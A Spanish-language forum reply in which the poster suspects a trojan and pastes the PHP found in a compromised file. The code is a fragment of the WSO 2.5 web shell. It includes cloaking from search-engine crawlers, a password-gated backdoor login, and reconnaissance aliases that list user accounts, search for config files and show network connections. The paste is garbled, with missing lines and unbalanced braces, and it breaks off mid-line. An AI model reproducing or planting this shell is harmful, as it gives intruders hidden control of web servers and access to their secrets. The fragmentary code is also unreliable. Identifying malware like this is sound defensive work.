Seguramente sea de algún trojano o algo parecido, esa línea contiene este código:
Código PHP:
Ver originalif(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp",
"MSNBot",
"ia_archiver",
"Yandex",
"Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
}
}
@define('WSO_VERSION', '2.5');
function WSOstripslashes($array) {
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
}
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie
(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin();
}
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
$disable_functions = @ini_get('disable_functions');
if($os == 'win') {
}
if($cwd[strlen($cwd)-1] != '/') $cwd .= '/';
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool
)$default_use_ajax;
if($os == 'win')
$aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else
$aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -v